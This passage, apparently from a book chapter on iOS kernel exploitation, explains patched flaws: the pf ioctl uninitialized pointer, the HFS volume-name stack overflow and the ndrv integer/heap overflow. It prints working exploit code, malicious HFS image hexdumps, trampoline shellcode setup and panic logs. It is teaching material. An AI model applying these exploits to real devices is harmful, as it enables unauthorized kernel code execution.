r4: 0x856e02e0  r5: 0x000000cf  r6: 0xc0a886ac  r7: 0xcd273fa8
r8: 0x00000001  r9: 0xc0a884b0 r10: 0x80293a50 r11: 0x832b8244
12: 0x00000000  sp: 0xcd273f90  lr: 0x801a96e8  pc: 0x8032b308
cpsr: 0x20000033 fsr: 0x856e02e0 far: 0xcd273fa8

This should be enough to show how easy it is to achieve arbitrary kernel code execution if you are able to write directly into kernel memory. The exploit gets harder if the vulnerability does not allow you to write whatever you want, but limits the possible values to write. However, the vulnerability discussed in the next section shows that even very limited kernel memory manipulations can still lead to arbitrary code execution.

Uninitialized Kernel Variables

This exploit causes an uninitialized pointer element within a kernel structure to get filled from user space. The vulnerability is located within the IOCTL handler of the packet filter device and was discovered and exploited by comex. His exploit was then used within the limera1n jailbreaking tool for untethering iOS 4.1. Apple fixed this vulnerability, which is also known as CVE-2010-3830, in iOS 4.2.1. Therefore, you can exploit this vulnerability only on devices running iOS 4.1 and below.

To understand the vulnerability, you can take a look at the IOCTL handler of the packet filter device, because it is part of the original XNU kernel source. The source tree needs to be only old enough to still be vulnerable (for example, xnu-1504.9.17). The vulnerable IOCTL handler is defined inside the file /bsd/net/pf_ioctl.c as follows:

static int
pfioctl(dev_t dev, u_long cmd, caddr_t addr, int flags, struct proc *p)
{
   /* ... */
   switch (cmd) {
   /* ... */
   case DIOCADDRULE: {
      struct pfioc_rule *pr = (struct pfioc_rule *)addr;
      struct pf_ruleset *ruleset;
      struct pf_rule    *rule, *tail;
     
      /* ... copying and initializing part of the structure */
      bcopy(&pr->rule, rule, sizeof (struct pf_rule));
      rule->cuid = kauth_cred_getuid(p->p_ucred);
      rule->cpid = p->p_pid;
      rule->anchor = NULL;
      rule->kif = NULL;
      TAILQ_INIT(&rule->rpool.list);
      /* initialize refcounting */
      rule->states = 0;
      rule->src_nodes = 0;
      rule->entries.tqe_prev = NULL;

      /* ... copying and initializing part of the structure */
      if (rule->overload_tblname[0]) {
         if ((rule->overload_tbl = pfr_attach_table(ruleset,
              rule->overload_tblname)) == NULL)
             error = EINVAL;
         else
            rule->overload_tbl->pfrkt_flags |= PFR_TFLAG_ACTIVE;
      }

The important part in this code is that the structure element overload_tbl is not initialized if the overload_tblname is an empty string. This would be fine if all other parts of the code would use the same check, but other parts only check that overload_tbl is not a NULL pointer. To abuse this you have to trigger a call of the pf_rm_rule() function that is used to remove a rule:

void
pf_rm_rule(struct pf_rulequeue *rulequeue, struct pf_rule *rule)
{
   if (rulequeue != NULL) {
      if (rule->states <= 0) {
         /*
          * XXX - we need to remove the table *before* detaching
          * the rule to make sure the table code does not delete
          * the anchor under our feet.
          */
         pf_tbladdr_remove(&rule->src.addr);
         pf_tbladdr_remove(&rule->dst.addr);
         if (rule->overload_tbl)
            pfr_detach_table(rule->overload_tbl);
      }

To trigger such a code path you can simply let the DIOCADDRULE IOCTL handler fail. However, several other ways exist, and comex decided to use the PF_CHANGE_REMOVE action of the DIOCCHANGERULE IOCTL call instead:

case DIOCCHANGERULE:
   /* ... */
   if (pcr->action == PF_CHANGE_REMOVE) {
      pf_rm_rule(ruleset->rules[rs_num].active.ptr, oldrule);
      ruleset->rules[rs_num].active.rcount--;
   } else {

No matter which method is chosen, the code finally calls the pfr_detach_table() function to decrease the reference counter of the table:

void
pfr_detach_table(struct pfr_ktable *kt)
{
   lck_mtx_assert(pf_lock, LCK_MTX_ASSERT_OWNED);

   if (kt->pfrkt_refcnt[PFR_REFCNT_RULE] <= 0)
      printf("pfr_detach_table: refcount = %d.\n",
      kt->pfrkt_refcnt[PFR_REFCNT_RULE]);
   else if (!--kt->pfrkt_refcnt[PFR_REFCNT_RULE])
      pfr_setflags_ktable(kt, kt->pfrkt_flags&~PFR_TFLAG_REFERENCED);
}

It is important to remember that the attacker controls the kt pointer that is used within this function by setting the overload_tbl pointer accordingly. This means a user space process can use this vulnerability to decrease an integer stored anywhere in kernel memory. The only limitation is that the value cannot be smaller than or equal to zero. Before we discuss how you can use this arbitrary memory decrease vulnerability to execute your own code, take a look at comex's exploit code. First, it opens the packet filter device and resets it via IOCTL. It then calls the pwn() function repeatedly, which implements the actual exploit and decreases the supplied address a defined number of times:

// Yes, reopening is necessary
pffd = open("/dev/pf", O_RDWR);
ioctl(pffd, DIOCSTOP);
assert(!ioctl(pffd, DIOCSTART));
while(num_decs--)
   pwn(<patchaddress>);
assert(!ioctl(pffd, DIOCSTOP));
close(pffd);

Within the pwn() function, the necessary structures are set up and the vulnerable IOCTL handlers are called to first add the malicious rule and immediately remove it afterwards. This decreases the integer stored at the supplied memory address by one.

static void pwn(unsigned int addr) {
    struct pfioc_trans trans;
    struct pfioc_trans_e trans_e;
    struct pfioc_pooladdr pp;
    struct pfioc_rule pr;

    memset(&trans, 0, sizeof(trans));
    memset(&trans_e, 0, sizeof(trans_e));
    memset(&pr, 0, sizeof(pr));

    trans.size = 1;
    trans.esize = sizeof(trans_e);
    trans.array = &trans_e;
    trans_e.rs_num = PF_RULESET_FILTER;
    memset(trans_e.anchor, 0, MAXPATHLEN);
    assert(!ioctl(pffd, DIOCXBEGIN, &trans));
    u_int32_t ticket = trans_e.ticket;

    assert(!ioctl(pffd, DIOCBEGINADDRS, &pp));
    u_int32_t pool_ticket = pp.ticket;

    pr.action = PF_PASS;
    pr.nr = 0;
    pr.ticket = ticket;
    pr.pool_ticket = pool_ticket;
    memset(pr.anchor, 0, MAXPATHLEN);
    memset(pr.anchor_call, 0, MAXPATHLEN);

    pr.rule.return_icmp = 0;
    pr.rule.action = PF_PASS;
    pr.rule.af = AF_INET;
    pr.rule.proto = IPPROTO_TCP;
    pr.rule.rt = 0;
    pr.rule.rpool.proxy_port[0] = htons(1);
    pr.rule.rpool.proxy_port[1] = htons(1);

    pr.rule.src.addr.type = PF_ADDR_ADDRMASK;
    pr.rule.dst.addr.type = PF_ADDR_ADDRMASK;
   
    pr.rule.overload_tbl = (void *)(addr - 0x4a4);
   
    errno = 0;

    assert(!ioctl(pffd, DIOCADDRULE, &pr));

    assert(!ioctl(pffd, DIOCXCOMMIT, &trans));

    pr.action = PF_CHANGE_REMOVE;
    assert(!ioctl(pffd, DIOCCHANGERULE, &pr));
}

The most important part here is that the exploit subtracts the value 0x4a4 from the address of the value you want to decrease. This is necessary because 0x4a4 is the offset of the reference counter within the table structure, so the counter the kernel decrements then lies exactly at the target address.
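The offset arithmetic can be checked with a small user space sketch. The structure below is a hypothetical stand-in, not the real kernel table structure; only the 0x4a4 offset comes from the text, and the function names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offset of the reference counter inside the table structure (from the text). */
#define REFCNT_OFFSET 0x4a4u

/* Hypothetical stand-in for the kernel table structure: only the position
 * of the reference counter matters for this sketch. */
struct fake_table {
    uint8_t  opaque[REFCNT_OFFSET]; /* fields that are irrelevant here */
    uint32_t refcnt;                /* the counter that gets decremented */
};

/* Value to store in overload_tbl so that the counter lands on target. */
uint32_t table_base_for(uint32_t target)
{
    assert(target >= REFCNT_OFFSET); /* avoid wrapping below zero */
    return target - REFCNT_OFFSET;
}

/* Address that is touched when the counter of a table at table_base changes. */
uint32_t refcnt_address(uint32_t table_base)
{
    return table_base + (uint32_t)offsetof(struct fake_table, refcnt);
}
```

Feeding the result of table_base_for() into refcnt_address() returns the original target, which is the property the exploit relies on.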

Now that you can decrement a value anywhere within kernel memory, the question is how to turn this into an arbitrary code execution exploit. Quite a number of possibilities exist. Because you can repeat the exploit an unlimited number of times, you can zero out parts of the kernel code, which will be decoded as MOVS R0,R0 in Thumb code. This is more or less a NOP, and therefore you can use it to overwrite security checks. That way you can introduce new vulnerabilities like stack buffer overflows.

An easier attack is to decrement the highest byte of a kernel-level function pointer. By repeatedly decrementing, it is possible to move the kernel-level function pointer into the user space memory area. Comex uses this approach in his exploit and decrements the system call handler 0 until it points into user space memory. Afterwards he uses the mmap() system call to map memory at this address. The mapped memory is then filled with trampoline code that jumps into the code segment of the exploit:

unsigned int target_addr = CONFIG_TARGET_ADDR;
unsigned int target_addr_real = target_addr & ~1;
unsigned int target_pagebase = target_addr & ~0xfff;
unsigned int num_decs = (CONFIG_SYSENT_PATCH_ORIG - target_addr) >> 24;
assert(MAP_FAILED != mmap((void *) target_pagebase, 0x2000,
       PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0));
unsigned short *p = (void *) target_addr_real;
if(target_addr_real & 2) *p++ = 0x46c0; // nop
*p++ = 0x4b00; // ldr r3, [pc]
*p++ = 0x4718; // bx r3
*((unsigned int *) p) = (unsigned int) &ok_go;
assert(!mprotect((void *)target_pagebase, 0x2000,
       PROT_READ | PROT_EXEC));

Once everything is in place, the arbitrary code execution is triggered by executing syscall(0).
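The num_decs calculation is easier to follow with concrete numbers. The following sketch only models the arithmetic. The addresses used with it are invented for illustration and are not the real values of CONFIG_SYSENT_PATCH_ORIG or CONFIG_TARGET_ADDR.

```c
#include <assert.h>
#include <stdint.h>

/* Number of decrements of the most significant byte that move orig down
 * to target. Both addresses must agree in their lower 24 bits, because
 * only the top byte is modified. */
uint32_t decrements_needed(uint32_t orig, uint32_t target)
{
    assert(orig >= target);
    assert(((orig ^ target) & 0x00ffffffu) == 0);
    return (orig - target) >> 24;
}

/* Model of the effect on the pointer: the top byte drops by one per step. */
uint32_t apply_top_byte_decrements(uint32_t ptr, uint32_t n)
{
    while (n--)
        ptr -= 0x01000000u;
    return ptr;
}
```

With a made-up handler address of 0x80123457 and a user space target of 0x2f123457, decrements_needed() yields 0x51, so the pwn() function would have to run 81 times.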

Kernel Stack Buffer Overflows

Kernel-level stack buffer overflow vulnerabilities are usually caused by an unrestricted copy operation into a stack-based buffer. Whenever this happens, the saved return address on the kernel stack can be overwritten and replaced with a pointer to your shellcode. As you saw in the previous examples, iOS allows returning to code that was injected into writable kernel memory or returning into code that already existed in the user space memory range. Unlike in user space, there are no exploit mitigations within the kernel; therefore, exploiting a kernel-level stack buffer overflow in iOS 4 is pretty straightforward. It nearly always comes down to overwriting the return address and returning into code already prepared from user space. In iOS 5 it is a little bit more difficult and usually requires the use of some kernel-level return oriented programming.

The example for this vulnerability class was discovered by pod2g and is known as the HFS legacy volume name stack buffer overflow. It is caused by an unrestricted character-set copy and conversion function that is called while mounting a legacy HFS filesystem. An exploit for this vulnerability was first distributed with the iOS 4.2.1 jailbreak. It consists of three parts. The first part is merely a piece of code that mounts a malicious HFS filesystem from an image file. The second part is the malicious image itself that triggers the buffer overflow, and the third and last part is the actual payload code that is mapped at the specific position to which the exploit returns.

Before you look into the actual exploit you first have to look at the vulnerable code. It is part of the XNU kernel code and therefore available as open source. The vulnerable code is located within the file /bsd/hfs/hfs_encoding.c inside the function mac_roman_to_unicode():

int
mac_roman_to_unicode(const Str31 hfs_str, UniChar *uni_str,
                     __unused u_int32_t maxCharLen,
                     u_int32_t *unicodeChars)
{
   const u_int8_t  *p;
   UniChar  *u;
   u_int16_t  pascalChars;
   u_int8_t  c;

   p = hfs_str;
   u = uni_str;

   *unicodeChars = pascalChars = *(p++);   /* pick up length byte */

   while (pascalChars--) {
      c = *(p++);

      if ( (int8_t) c >= 0 ) {    /* check if seven bit ascii */
         *(u++) = (UniChar) c;    /* just pad high byte with zero */
      } else { /* its a hi bit character */
         /* ... */
      }
   }

   return noErr;
}

A few things are very interesting about this function. First of all, the function is called with a parameter specifying the maximum number of characters that fit into the output buffer (maxCharLen). You can also see that this parameter is not used at all inside the function. Instead, the string is expected to be in Pascal format, which means the first byte defines the length. This length field is fully trusted by the copy and conversion loop. There is no check that protects against writing past the end of the buffer. The next important thing here is that the output character width is 16 bit, which means that every second byte will be zero. The only exceptions are characters with byte values above 127. Those are converted by a lookup table that severely limits the possible outputs. That code was omitted, because it is not usable for the exploit. Because every second byte is filled with zero, the most significant byte of an overwritten return address is always zero. You can therefore return into only the first 16 megabytes of user space memory, and don't really have a chance to use one of the other exploitation methods.
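For comparison, here is a minimal sketch of what a bounded version of the conversion loop could look like. It is not Apple's fix. The function name and the UniChar16 type are hypothetical, and only the seven-bit ASCII path is modelled.

```c
#include <stddef.h>
#include <stdint.h>

typedef uint16_t UniChar16; /* hypothetical stand-in for the kernel's UniChar */

/* Converts a Pascal string to 16-bit characters.
 * Returns 0 on success and -1 if the length byte exceeds max_chars or a
 * high-bit character is found (the lookup table path is not modelled). */
int pascal_ascii_to_utf16_checked(const uint8_t *pstr, UniChar16 *out,
                                  uint32_t max_chars, uint32_t *out_chars)
{
    uint32_t len = pstr[0];     /* Pascal string: first byte is the length */

    if (len > max_chars)
        return -1;              /* the check the vulnerable function lacks */

    for (uint32_t i = 0; i < len; i++) {
        uint8_t c = pstr[1 + i];
        if (c & 0x80)
            return -1;          /* not seven-bit ASCII */
        out[i] = (UniChar16)c;  /* high byte is padded with zero */
    }
    *out_chars = len;
    return 0;
}
```

The single comparison against max_chars is what the unused maxCharLen parameter would have made possible in the original function.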

When mounting an HFS image, the call to mac_roman_to_unicode() comes from within the function hfs_to_utf8(), which is also defined within the file /bsd/hfs/hfs_encoding.c. The call is via a function pointer.

int
hfs_to_utf8(ExtendedVCB *vcb, const Str31 hfs_str, ByteCount maxDstLen,
 ByteCount *actualDstLen, unsigned char* dstStr)
{
   int error;
   UniChar uniStr[MAX_HFS_UNICODE_CHARS];
   ItemCount uniCount;
   size_t utf8len;
   hfs_to_unicode_func_t hfs_get_unicode = VCBTOHFS(vcb)->hfs_get_unicode;

   error = hfs_get_unicode(hfs_str, uniStr,
                           MAX_HFS_UNICODE_CHARS, &uniCount);

   if (uniCount == 0)
      error = EINVAL;

   if (error == 0) {
      error = utf8_encodestr(uniStr, uniCount * sizeof(UniChar),
                             dstStr, &utf8len, maxDstLen, ':', 0);
      if (error == ENAMETOOLONG)
         *actualDstLen = utf8_encodelen(uniStr,
                                        uniCount * sizeof(UniChar),
                                        ':', 0);
      else
         *actualDstLen = utf8len;
   }

   return error;
}

Now have a look at the definition of the legacy HFS master directory header included as part of the XNU source code in the file /bsd/hfs/hfs_format.h. The master directory block is stored within the third sector of the filesystem and a copy is also stored in the second to last sector:

/* HFS Master Directory Block - 162 bytes */
/* Stored at sector #2 (3rd sector) and second-to-last sector. */
struct HFSMasterDirectoryBlock {
    u_int16_t       drSigWord;  /* == kHFSSigWord */
    u_int32_t       drCrDate;   /* date and time of volume creation */
    u_int32_t       drLsMod;    /* date and time of last modification */
    u_int16_t       drAtrb;     /* volume attributes */
    u_int16_t       drNmFls;    /* number of files in root folder */
    u_int16_t       drVBMSt;    /* first block of volume bitmap */
    u_int16_t       drAllocPtr; /* start of next allocation search */
    u_int16_t       drNmAlBlks; /* number of allocation blocks in volume */
    u_int32_t       drAlBlkSiz; /* size (in bytes) of allocation blocks */
    u_int32_t       drClpSiz;   /* default clump size */
    u_int16_t       drAlBlSt;   /* first allocation block in volume */
    u_int32_t       drNxtCNID;  /* next unused catalog node ID */
    u_int16_t       drFreeBks;  /* number of unused allocation blocks */
    u_int8_t        drVN[kHFSMaxVolumeNameChars + 1];  /* volume name */
    u_int32_t       drVolBkUp;  /* date and time of last backup */
    u_int16_t       drVSeqNum;  /* volume backup sequence number */
    ...

You can see that in the original definition a maximum number of kHFSMaxVolumeNameChars characters are allowed for the volume name. The source code defines this constant as 27. The code does not limit this field in any way, and therefore overlong volume names just get passed through to the Unicode conversion function. With this information you can now create a malicious HFS image that triggers the overflow:

$ hexdump -C exploit.hfs
 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000400  42 44 00 00 00 00 00 00  00 00 01 00 00 00 00 00  |BD..............|
 00000410  00 00 00 00 00 00 02 00  00 00 00 00 00 00 00 00  |................|
 00000420  00 00 00 00 60 41 41 41  41 42 42 42 42 43 43 43  |....`AAAABBBBCCC|
 00000430  43 44 44 44 44 45 45 45  45 46 46 46 46 47 47 47  |CDDDDEEEEFFFFGGG|
 00000440  47 48 48 48 48 49 49 49  49 4a 4a 4a 4a 4b 4b 4b  |GHHHHIIIIJJJJKKK|
 00000450  4b 4c 4c 4c 4c 4d 4d 4d  4d 4e 4e 4e 4e 4f 4f 4f  |KLLLLMMMMNNNNOOO|
 00000460  4f 50 50 50 50 51 51 51  51 52 52 52 52 53 53 53  |OPPPPQQQQRRRRSSS|
 00000470  53 54 54 54 54 55 55 55  55 56 56 56 56 57 57 57  |STTTTUUUUVVVVWWW|
 00000480  57 58 58 58 58 00 00 00  00 00 00 00 00 00 00 00  |WXXXX...........|
 00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000600

This HFS image contains an overlong volume name of 96 bytes, which should overflow the buffer in this case. Because the name consists of real letters from the alphabet, the Unicode conversion should transform all of them into illegal memory addresses, which heightens the probability of a crash. To mount the HFS image, you have to use the /dev/vn0 device:

int ret, fd; struct vn_ioctl vn; struct hfs_mount_args args;
   
fd = open("/dev/vn0", O_RDONLY, 0);
if (fd < 0) {
   puts("Can't open /dev/vn0 special file.");
   exit(1);
}
   
memset(&vn, 0, sizeof(vn));
ioctl(fd, VNIOCDETACH, &vn);
vn.vn_file = "/usr/lib/exploit.hfs";
vn.vn_control = vncontrol_readwrite_io_e;
ret = ioctl(fd, VNIOCATTACH, &vn);
close(fd);
if (ret < 0) {
    puts("Can't attach vn0.");
    exit(1);
}
   
memset(&args, 0, sizeof(args));
args.fspec = "/dev/vn0";
args.hfs_uid = args.hfs_gid = 99;
args.hfs_mask = 0x1c5;
ret = mount("hfs", "/mnt/", MNT_RDONLY, &args);

When you attempt to mount your previously constructed HFS image while running a vulnerable kernel, this immediately results in a kernel panic. You can analyze the crash dump to see what is going on:

Hardware Model:      iPod4,1
Date/Time:       2011-07-26 09:55:12.761 +0200
OS Version:      iPhone OS 4.2.1 (8C148)

kernel abort type 4: fault_type=0x3, fault_addr=0x570057
r0: 0x00000041  r1: 0x00000000  r2: 0x00000000  r3: 0x000000ff
r4: 0x00570057  r5: 0x00540053  r6: 0x00570155  r7: 0xcdbfb720
r8: 0xcdbfb738  r9: 0x00000000 r10: 0x0000003a r11: 0x00000000
12: 0x00000000  sp: 0xcdbfb6e0  lr: 0x8011c47f  pc: 0x8009006a
cpsr: 0x80000033 fsr: 0x00000805 far: 0x00570057

As you can see, the panic is due to an invalid memory access at address 0x570057, which is equal to the value of the R4 register. You can also see that the registers R4, R5, and R6 are controlled by the buffer overflow. However, you do not control the program counter PC, and therefore should have a look at the code near PC and also LR:

80090066                 CMP             R4, R6
80090068                 BCS             loc_80090120
8009006A
8009006A loc_8009006A    ; CODE XREF: _utf8_encodestr+192
8009006A                 STRB.W          R0, [R4],#1
8009006E                 B               loc_8008FFD6

As expected, the instruction at the PC tries to write to the address held in the R4 register and therefore causes the kernel panic. You can also see that you are within the function utf8_encodestr(), which is not the place you wanted to end up. By checking the code around LR you see that the call came from hfs_to_utf8(), which was expected:

8011C476                 MOVS            R5, #0x3A
8011C478                 STR             R5, [SP,#0xB8+var_B4]
8011C47A                 BL              _utf8_encodestr
8011C47E                 CMP             R0, #0x3F
8011C480                 MOV             R4, R0

From the source code you can see that you reach this code path only if the variable uniCount is not zero. This variable is overwritten by the buffer overflow, and therefore you can adjust your payload to fill it with a value of zero. The stack layout at the time of the overflow is shown in Figure 9.6.

Figure 9.6 Stack layout at time of overflow

By looking at the stack layout, you can figure out where in the payload you have to change bytes in order to preset the values of uniCount, R4 to R7, and the program counter in PC:

$ hexdump -C exploit_improved.hfs
 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000400  42 44 00 00 00 00 00 00  00 00 01 00 00 00 00 00  |BD..............|
 00000410  00 00 00 00 00 00 02 00  00 00 00 00 00 00 00 00  |................|
 00000420  00 00 00 00 60 58 58 58  58 58 58 58 58 58 58 58  |....`XXXXXXXXXXX|
 00000430  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000440  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000450  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000460  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000470  58 58 00 00 41 41 42 42  43 43 44 44 45 45 46 46  |XX..AABBCCDDEEFF|
 00000480  47 47 48 48 58 00 00 00  00 00 00 00 00 00 00 00  |GGHHX...........|
 00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000600

Now after mounting the new file again you can analyze the generated paniclog and check if your assumptions were correct. Indeed, you can see that all the registers are filled with the expected values. In addition to that, you can also see that the panic was caused by the CPU trying to read the next instruction at 0x450044, which shows that you successfully hijacked the code flow:

Hardware Model:      iPod4,1
Date/Time:       2011-07-26 11:05:23.612 +0200
OS Version:      iPhone OS 4.2.1 (8C148)

sleh_abort: prefetch abort in kernel mode: fault_addr=0x450044
r0: 0x00000016  r1: 0x00000000  r2: 0x00000058  r3: 0xcdbf37d0
r4: 0x00410041  r5: 0x00420042  r6: 0x00430043  r7: 0x00440044
r8: 0x8a3ee804  r9: 0x00000000 r10: 0x81b44250 r11: 0xc07c7000
12: 0x89640c88  sp: 0xcdbf37e8  lr: 0x8011c457  pc: 0x00450044
cpsr: 0x20000033 fsr: 0x00000005 far: 0x00450044

To finalize your exploit you need to map some shellcode to the address 0x450044 with mmap() from user space, or change the HFS image to return to a different address where your shellcode is already mapped.
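The relationship between the bytes in the image and the values in the panic log can be reproduced with a few lines of C. This is only a model of the widening performed by the conversion loop on a little-endian ARM device, and the function names are hypothetical.

```c
#include <stdint.h>

/* 32-bit little-endian word that ends up on the stack when two consecutive
 * seven-bit ASCII bytes are each widened to 16 bits. */
uint32_t widened_pair(uint8_t first, uint8_t second)
{
    return (uint32_t)first | ((uint32_t)second << 16);
}

/* Address that is fetched when such a word is used as a return address on
 * ARM: bit 0 selects Thumb mode and is not part of the address. */
uint32_t fetch_address(uint32_t return_word)
{
    return return_word & ~1u;
}
```

The pair "AA" from the image yields 0x00410041, the value seen in R4, and the pair "EE" yields 0x00450045, which is fetched from 0x450044 in Thumb mode as shown in the panic log. Changing the two bytes that overwrite the saved PC therefore selects a different return address, as long as it has the form 0x00XX00YY.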

Kernel Heap Buffer Overflows

Kernel-level heap buffer overflow vulnerabilities are caused by an unrestricted copy operation into a heap-based buffer. The result of such an overflow depends on the actual heap implementation and the surrounding memory blocks, which will determine if it can be used for exploitation and allow arbitrary code execution or controlled memory corruption. Similar to the lack of kernel space protections against stack-based buffer overflows, there are also no protections against heap-based buffer overflows inside the iOS kernel. The overall exploitation of heap-based buffer overflow is far more complex than the previously discussed problem types and requires a good understanding of the implementation of the heap allocator. But before we go into the actual exploitation, we will first introduce the vulnerability that was used within redsn0w to untether the iOS 4.3.1 to 4.3.3 jailbreaks.

The discussed vulnerability is located within the ndrv_setspec() function, which is defined in the file /bsd/net/ndrv.c. The actual vulnerability is not a simple heap-based buffer overflow, but an integer overflow in a multiplication that is used to calculate the amount of heap memory allocated. Because the user-supplied demux_count is not checked, the result of the multiplication can exceed what fits into a 32-bit variable and wrap around. The allocation then returns a buffer that is too small, as you can see in the following code:

bzero(&proto_param, sizeof(proto_param));
proto_param.demux_count = ndrvSpec.demux_count;

/* Allocate storage for demux array */
MALLOC(ndrvDemux, struct ndrv_demux_desc*, proto_param.demux_count *
       sizeof(struct ndrv_demux_desc), M_TEMP, M_WAITOK);
if (ndrvDemux == NULL)
   return ENOMEM;

/* Allocate enough ifnet_demux_descs */
MALLOC(proto_param.demux_array, struct ifnet_demux_desc*,
       sizeof(*proto_param.demux_array) * ndrvSpec.demux_count,
       M_TEMP, M_WAITOK);
if (proto_param.demux_array == NULL)
   error = ENOMEM;

Both calls to _MALLOC() contain integer multiplications that overflow if demux_count is set to a value like 0x4000000a. Therefore, both buffers will be shorter than necessary for the supplied demux_count. The function continues by copying data from user space into the ndrvDemux buffer. However, because the number of bytes copied is calculated by the same overflowing formula, the copy exactly fills the allocated buffer and does not overflow it, as you can see here:

/* Copy the ndrv demux array from userland */
error = copyin(user_addr, ndrvDemux,
                    ndrvSpec.demux_count *
sizeof(struct ndrv_demux_desc));
ndrvSpec.demux_list = ndrvDemux;
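To see how small the buffers become for a demux_count of 0x4000000a, the 32-bit multiplication can be replayed in user space. The element sizes used with this sketch, 32 bytes for struct ndrv_demux_desc and 12 bytes for struct ifnet_demux_desc, are assumptions for a 32-bit kernel and do not come from the text. The checked variant shows one possible way to reject such a count and is not Apple's actual fix.

```c
#include <stdint.h>

/* Product as a 32-bit kernel computes it: the result wraps modulo 2^32. */
uint32_t alloc_size_32(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Overflow-safe variant: returns 1 and stores the product if it fits,
 * returns 0 and leaves *out untouched if it would wrap. */
int checked_alloc_size_32(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return 0;
    *out = count * elem_size;
    return 1;
}
```

Under these assumptions the first allocation shrinks to 0x140 bytes and the second one to 0x78 bytes, although the loop counter still believes there are more than a billion entries.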

The actual buffer overflow is hidden within a loop that converts the incoming data from user space into a kernel structure, which immediately follows this copy operation:

proto_param.demux_count = ndrvSpec.demux_count;
proto_param.input = ndrv_input;
proto_param.event = ndrv_event;

for (demuxOn = 0; demuxOn < ndrvSpec.demux_count; demuxOn++)
{
   /* Convert an ndrv_demux_desc to a ifnet_demux_desc */
   error = ndrv_to_ifnet_demux(&ndrvSpec.demux_list[demuxOn],
                               &proto_param.demux_array[demuxOn]);
   if (error)
      break;
}

You can see that the loop will continue to convert until everything is converted or an error is triggered. It should be obvious that you need to trigger this error somehow, because otherwise the amount copied will be too large and lead to a kernel crash. This is no problem, which you will see when you look into the conversion function ndrv_to_ifnet_demux(). But before you do this, look into the implementation of the kernel heap.

Kernel Heap Zone Allocator

To understand how a buffer overflow inside the kernel heap leads to exploitable situations, it is necessary to look into the implementation of the kernel heap. Multiple kernel heap implementations exist within the iOS kernel, but we discuss only the most analyzed one. The allocator we dissect is called the zone allocator and is the most commonly used one within iOS. It is defined within the file /osfmk/kern/zalloc.c and used through the zalloc(), zalloc_canblock(), and zfree() functions. In many cases, it is not used directly, but through a wrapper function. The most common usage is through the _MALLOC() function that calls kalloc() for the actual allocation. kalloc() wraps around two different allocators and chooses between them depending on the size of the allocated block. Smaller blocks are allocated through zalloc() and larger blocks are allocated through the kmem_alloc() function.

Before you look into the actual implementation of the zone allocator, have a look into the wrappers, because they are already interesting by themselves. The _MALLOC() function is defined within the file /bsd/kern/kern_malloc.c. It is special because it adds a header to the allocated data, which contains the size of the block. This is required, because it uses the kalloc()/kfree() functions internally and both of these need to get the size of the block passed.

void *
_MALLOC(
      size_t size,
      int    type,
      int    flags)
{
   struct _mhead *hdr;
   size_t        memsize = sizeof (*hdr) + size;

   if (type >= M_LAST)
      panic("_malloc TYPE");

   if (size == 0)
      return (NULL);

   if (flags & M_NOWAIT) {
      hdr = (void *)kalloc_noblock(memsize);
   } else {
      hdr = (void *)kalloc(memsize);

      if (hdr == NULL) {
         panic("_MALLOC: kalloc returned NULL (potential leak), size %llu",
               (uint64_t) size);
      }
   }
   if (!hdr)
      return (0);

   hdr->mlen = memsize;

   if (flags & M_ZERO)
      bzero(hdr->dat, size);

   return  (hdr->dat);
}

The most interesting part of this function is the possible integer overflow in the allocation that is triggered when 0xFFFFFFFC or more bytes are allocated. This could be triggered in several different places in the past; however, Apple silently fixed this vulnerability in iOS 5.0. Now _MALLOC() detects the possible integer overflow and returns NULL or panics, depending on the M_NOWAIT flag.
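The wraparound in the memsize calculation can be illustrated as follows. The header size of 4 bytes is an assumption for a 32-bit kernel, and memsize_checked() is only a sketch of the kind of test described above, not the code Apple ships.

```c
#include <stdint.h>

#define MHEAD_SIZE 4u /* assumed sizeof(struct _mhead) on a 32-bit kernel */

/* Size handed to kalloc() by the unpatched wrapper (wraps modulo 2^32). */
uint32_t memsize_unchecked(uint32_t size)
{
    return MHEAD_SIZE + size;
}

/* Returns 1 and stores the sum if it fits into 32 bits, 0 if it would wrap. */
int memsize_checked(uint32_t size, uint32_t *memsize)
{
    if (size > UINT32_MAX - MHEAD_SIZE)
        return 0;
    *memsize = MHEAD_SIZE + size;
    return 1;
}
```

A request for 0xFFFFFFFC bytes results in a memsize of 0 in the unchecked variant, and a request for 0xFFFFFFFF bytes results in a memsize of only 3.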

Nevertheless, _MALLOC() is just a wrapper around kalloc(), which is a bit more complicated, because it wraps two different kernel heap allocators. It is defined within the file /osfmk/kern/kalloc.c. We show only the relevant parts that involve the zone allocator, because the kmem_alloc() allocator has not been analyzed yet:

void *
kalloc_canblock(
      vm_size_t size,
      boolean_t canblock)
{
   register int zindex;
   register vm_size_t allocsize;
   vm_map_t alloc_map = VM_MAP_NULL;

   /*
    * If size is too large for a zone, then use kmem_alloc.
    */

   if (size >= kalloc_max_prerounded) {
      ...
   }

   /* compute the size of the block that we will actually allocate */

   allocsize = KALLOC_MINSIZE;
   zindex = first_k_zone;
   while (allocsize < size) {
      allocsize <<= 1;
      zindex++;
   }

   /* allocate from the appropriate zone */
   assert(allocsize < kalloc_max);
   return(zalloc_canblock(k_zone[zindex], canblock));
}

In iOS 4, kalloc() registered different zones for each power of 2 between 16 and 8192. Since iOS 5.0, there are a few additional zones registered for the sizes 24, 40, 48, 88, 112, 192, 384, 768, 1536, 3072, and 6144. It is assumed that these zones were added because they represent often requested memory sizes. When memory is allocated, it is allocated into the smallest zone into which it fits completely. This means a block of size 513 will end up in the 1024 bytes zone for iOS 4 and in the 768 bytes zone for iOS 5.
